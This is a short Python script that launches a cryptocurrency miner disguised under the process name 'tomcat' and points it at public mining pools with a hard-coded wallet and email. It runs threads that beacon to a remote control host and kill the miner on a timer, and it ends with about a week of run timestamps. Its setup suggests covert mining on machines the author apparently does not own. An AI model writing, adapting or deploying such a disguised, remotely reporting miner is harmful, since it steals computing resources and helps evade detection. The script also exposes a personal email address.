import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:04.954312
#2018-02-17 16:16:07.322329
#2018-02-17 18:03:06.677958
#2018-02-17 19:52:06.587236
#2018-02-17 21:41:04.071537
#2018-02-17 23:25:06.465817
#2018-02-18 01:14:01.659802
#2018-02-18 03:02:06.457064
#2018-02-18 04:49:05.526393
#2018-02-18 06:41:04.550837
#2018-02-18 08:30:06.342078
#2018-02-18 10:17:01.397652
#2018-02-18 12:03:04.555562
#2018-02-18 13:48:06.706753
#2018-02-18 15:38:01.988879
#2018-02-18 17:27:03.911947
#2018-02-18 19:15:04.670220
#2018-02-18 21:02:01.476495
#2018-02-18 22:48:01.955307
#2018-02-19 00:36:05.093855
#2018-02-19 02:22:05.866582
#2018-02-19 04:09:01.723540
#2018-02-19 05:53:05.780753
#2018-02-19 07:41:05.155752
#2018-02-19 09:30:08.845349
#2018-02-19 11:19:04.722410
#2018-02-19 13:07:02.198454
#2018-02-19 14:54:08.913524
#2018-02-19 16:43:01.329172
#2018-02-19 18:29:06.212290
#2018-02-19 20:16:04.950110
#2018-02-19 22:05:04.536533
#2018-02-19 23:50:09.356169
#2018-02-20 01:37:05.617154
#2018-02-20 03:25:05.671866
#2018-02-20 05:12:05.112741
#2018-02-20 06:55:01.403653
#2018-02-20 08:42:01.776409
#2018-02-20 10:26:01.265204
#2018-02-20 12:10:11.234443
#2018-02-20 13:58:04.305266
#2018-02-20 15:41:04.714171
#2018-02-20 17:26:09.512546
#2018-02-20 19:15:11.476774
#2018-02-20 21:05:07.447050
#2018-02-20 22:51:07.898116
#2018-02-21 00:33:07.519762
#2018-02-21 02:19:06.633613
#2018-02-21 04:06:06.945969
#2018-02-21 05:53:07.005629
#2018-02-21 07:41:04.332292
#2018-02-21 09:26:02.206397
#2018-02-21 11:14:08.669173
#2018-02-21 13:00:10.612708
#2018-02-21 14:48:05.276559
#2018-02-21 16:35:04.233141
#2018-02-21 18:24:07.823513
#2018-02-21 20:11:01.933588
#2018-02-21 21:57:08.166895
#2018-02-21 23:44:01.995248
#2018-02-22 01:33:09.264963
#2018-02-22 03:21:01.679466
#2018-02-22 05:07:05.081547
#2018-02-22 06:51:06.385440
#2018-02-22 08:38:04.255653
#2018-02-22 10:25:08.855786
#2018-02-22 12:11:10.308089
#2018-02-22 13:57:09.358982
#2018-02-22 15:44:08.320666
#2018-02-22 17:29:10.702692
#2018-02-22 19:16:02.204050
#2018-02-22 21:07:05.873844
#2018-02-22 22:53:06.287444
#2018-02-23 00:40:09.734813
#2018-02-23 02:26:01.319217
#2018-02-23 04:14:05.579167
#2018-02-23 06:01:01.638887
#2018-02-23 07:32:01.601404
#2018-02-23 09:35:04.184010
#2018-02-23 11:19:07.868993
#2018-02-23 12:38:07.378046
#2018-02-23 14:05:07.688047
#2018-02-23 15:42:09.409497
#2018-02-23 17:13:01.895333
#2018-02-23 18:47:08.444003
#2018-02-23 20:22:04.948818
#2018-02-23 21:55:08.703834
#2018-02-23 23:34:07.405041
#2018-02-24 01:01:05.803808
#2018-02-24 02:45:04.109601
#2018-02-24 04:24:01.870743
#2018-02-24 05:49:07.972675
#2018-02-24 07:24:06.296669
#2018-02-24 08:58:07.881770
#2018-02-24 10:36:03.316281
#2018-02-24 12:23:04.355432
#2018-02-24 13:56:07.710798
#2018-02-24 15:29:01.558802
#2018-02-24 17:04:01.630666
#2018-02-24 18:35:08.513902
#2018-02-24 20:07:05.267367
#2018-02-24 21:38:07.392560
#2018-02-25 00:09:06.941542
#2018-02-25 02:17:03.517986
#2018-02-25 05:43:01.472161
#2018-02-25 11:37:02.408556